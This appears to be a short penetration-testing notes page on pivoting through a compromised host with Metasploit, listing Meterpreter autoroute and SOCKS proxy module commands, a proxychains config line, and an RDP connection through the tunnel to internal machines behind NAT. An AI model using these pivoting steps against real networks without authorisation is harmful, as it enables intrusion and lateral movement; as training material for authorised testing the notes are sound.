MetaSploit

We’ll use reverse proxying to access machines that are protected by edge firewalls and Network Address Translation (NAT) configs

From Meterpreter

Send session to background

use multi/manage/autoroute
set session 1
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 4a
exploit -j

The autoroute module creates a reverse tunnel and allows us to direct network traffic into the appropriate subnet

Add socks config to conf file

sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains4.conf'

can now rdp

proxychains rdesktop 192.168.220.129

The route created by Meterpreter also allows us to access any other computer on that internal network.

circle-info

Having issues or need Socks5 for support for GoBuster? change the following 4 -> 5

set version 5 (for Metasploit module)

socks5 127.0.0.1 1080 (for config file)

Last updated